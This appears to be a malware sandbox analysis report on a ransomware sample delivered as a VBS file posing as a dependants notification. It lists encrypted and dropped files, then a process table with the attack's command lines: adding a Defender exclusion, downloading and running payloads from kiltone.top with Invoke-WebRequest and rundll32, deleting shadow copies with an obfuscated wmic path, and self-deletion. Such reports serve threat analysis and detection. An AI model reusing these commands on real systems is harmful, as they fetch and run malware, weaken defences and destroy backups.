C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm.pIwu
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite.ZohB
(copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm.MnmD
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.XsHY
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm.vAJd
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite.PZJc
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.json.ijIb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.json.NcDG (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm.RGAt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite.RTAF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini.jDnR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.xMod (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\BNAGMGSPLO.png.ldXh (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\EFOYFBOLXA.pdf.jLOH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\GIGIYTFFYT.mp3.bozc (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\GRXZDKKVDB.png.YiBf (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs.IuxW (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL.jpg.hJsc (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL.xlsx.RMxp (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.jpg.sMfp (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.mp3.lFzB (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.pdf.CnYs (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.docx.AvIQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.jpg.MGpE (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.xlsx.FPSw (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.jpg.PqND (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.xlsx.DWdi (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\PALRGUCVEH.pdf.obFM (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx.uOLw (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\TQDFJHPUIU.png.GrMv (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\ZIPXYXWIOY.mp3.eaoc (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE.docx.UMCd (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE.xlsx.qxWV (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\GRXZDKKVDB.png.PafQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.jpg.wmBJ (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PALRGUCVEH.mp3.rOlI (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.xlsx.LkfH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx.Aujp (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.pdf.klmt (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA.docx.OlAT (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.png.SuBC (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\PIVFAGEAAV.jpg.Jmvl (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\PWCCAWLGRE.xlsx.Enjo (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.zdiR (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\SQSJKEBWDT.mp3.SPqH (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.pdf.vgtM (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.mp3.OCcK (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.pdf.MtDa (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.xlsx.EZOu (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL.docx.DVAd (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL.pdf.tRzP (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.pdf.oSRv (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\GIGIYTFFYT.mp3.VOBN (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\SQSJKEBWDT.xlsx.suJP (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx.LqeT (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\ZGGKNSUKOP.png.fhqW (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\TQDFJHPUIU.png.hwrj (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\ZGGKNSUKOP.png.vzFV (copy)
|
data
|
dropped
|
||
C:\Users\user\Desktop\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\ZIPXYXWIOY.mp3.IDiG (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\BNAGMGSPLO.png.XSDv (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\EFOYFBOLXA.pdf.VaSK (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\EIVQSAOTAQ.jpg.zhAK (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\GIGIYTFFYT.mp3.wvms (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Documents\GRXZDKKVDB.png.NnMG (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL.jpg.EvKO (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL.xlsx.wUnQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.jpg.tRgo (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.mp3.PlGN (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.pdf.FHtL (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.docx.KbwQ (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.jpg.tjwm (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.xlsx.Hbyw (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\EIVQSAOTAQ.jpg.iujN (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.xlsx.iOYd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\PALRGUCVEH.pdf.wUyz (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx.KvSG (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\TQDFJHPUIU.png.RMnW (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\ZIPXYXWIOY.mp3.NgTW (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE.docx.EoGH (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE.xlsx.oZBX (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\GRXZDKKVDB.png.NFZv (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\NVWZAPQSQL.jpg.FXuV (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PALRGUCVEH.mp3.PaIb (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PIVFAGEAAV.xlsx.CQOT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx.SojF (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\SQSJKEBWDT.pdf.AnJD (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA.docx.sCGS (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.png.aTSz (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\PIVFAGEAAV.jpg.KCBF (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\PWCCAWLGRE.xlsx.yYLv (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.OjRs (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\SQSJKEBWDT.mp3.ZUJd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.pdf
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.pdf.ybWi (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.mp3.VCiM (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.pdf.zSBT (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.xlsx.ydFM (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL.docx.Kder (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL.pdf.JehM (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\EFOYFBOLXA.pdf.xEHd (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\GIGIYTFFYT.mp3.FDkK (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\PALRGUCVEH.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\PALRGUCVEH.jpg.aLnb (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\SQSJKEBWDT.xlsx.qAjI (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\SUAVTZKNFL.docx.fCTX (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\ZGGKNSUKOP.png.hjST (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\TQDFJHPUIU.png.FvUn (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Documents\ZGGKNSUKOP.png.AzRi (copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\ZIPXYXWIOY.mp3.WNwU (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\3e6b5c7a-f1f6-4521-b38a-41e203df3636.tmp
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\BNAGMGSPLO.png.BbGl (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\EFOYFBOLXA.pdf.AJnS (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\EIVQSAOTAQ.jpg.xWDr (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\GIGIYTFFYT.mp3.hNPO (copy)
|
OpenPGP Secret Key Version 2
|
dropped
|
||
C:\Users\user\Downloads\GRXZDKKVDB.png.DSvz (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\NVWZAPQSQL.jpg.jXxe (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\NVWZAPQSQL.xlsx.PzTr (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.jpg.urqX (copy)
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.mp3.ceXj (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.pdf.DhmR (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.docx.uTlg (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.jpg.sKAN (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.xlsx.VQca (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWCCAWLGRE.docx.Kpro (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWCCAWLGRE.xlsx.dYKD (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\QCFWYSKMHA.docx.kieO (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.mp3.DTCV (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.pdf.jsez (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SUAVTZKNFL.docx.HzwX (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\SUAVTZKNFL.pdf.ykDd (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\TQDFJHPUIU.png.XQDF (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\ZGGKNSUKOP.png.YClX (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\ZIPXYXWIOY.mp3.baRA (copy)
|
data
|
dropped
|
||
C:\Users\user\Downloads\be032c20-43a3-4996-a07b-7fbdcff774d3.tmp
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf.crdownload
|
PDF document, version 1.6 (zip deflate encoded)
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf.qUDX (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Amazon.url.rdDs (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Bing.url.VbmB (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Facebook.url.fOSa (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Google.url.tKbU (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Live.url.LYbX (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\NYTimes.url.Tdnf (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Reddit.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Reddit.url.YFaU (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Twitter.url.JYZb (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Wikipedia.url.HkqY (copy)
|
data
|
dropped
|
||
C:\Users\user\Favorites\Youtube.url.cmae (copy)
|
data
|
dropped
|
||
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.dfXP (copy)
|
data
|
dropped
|
||
C:\Users\user\ntuser.ini.deyZ (copy)
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 625
|
HTML document, ASCII text, with very long lines (6862)
|
downloaded
|
||
Chrome Cache Entry: 626
|
PDF document, version 1.6 (zip deflate encoded)
|
downloaded
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 796 hidden files.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\SysWOW64\rundll32.exe
|
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /c %temp%/eryy65ty.exe
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
C:\Users\user\AppData\Local\Temp/eryy65ty.exe
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\shCUqe\shCU\..\..\Windows\shCU\shCU\..\..\system32\shCU\shCU\..\..\wbem\shCU\shCUq\..\..\wmic.exe shadowcopy delete
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\fPLdrv\fPLd\..\..\Windows\fPLd\fPLd\..\..\system32\fPLd\fPLd\..\..\wbem\fPLd\fPLdr\..\..\wmic.exe shadowcopy delete
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\gNJiqW\gNJi\..\..\Windows\gNJi\gNJi\..\..\system32\gNJi\gNJi\..\..\wbem\gNJi\gNJiq\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\SmbaZD\Smba\..\..\Windows\Smba\Smba\..\..\system32\Smba\Smba\..\..\wbem\Smba\SmbaZ\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\VhJyqT\VhJy\..\..\Windows\VhJy\VhJy\..\..\system32\VhJy\VhJy\..\..\wbem\VhJy\VhJyq\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\EpadjY\Epad\..\..\Windows\Epad\Epad\..\..\system32\Epad\Epad\..\..\wbem\Epad\Epadj\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2016,i,7727071625406285567,4283038652588127997,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\control.exe
|
control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\notepad.exe
|
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://kiltone.top/ste
|
unknown
|
||
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
|||
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
|
unknown
|
||
https://kiltone.top/stelin/Gosjeufon.cpl
|
45.125.67.168
|
||
https://kiltone.top/stelin/rwcla.cpl
|
45.125.67.168
|
||
https://www.oldmutual.co.za/v3/assets/blt0
|
unknown
|
||
https://kiltone.top/stelin/rwcla.
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239381138051_1QKM3152ZV6SHG2T8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://digify.com/a/#/access/login
|
unknown
|
||
https://www.ctrip.com/
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
|
unknown
|
||
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
|
unknown
|
||
https://account.bellmedia.c
|
unknown
|
||
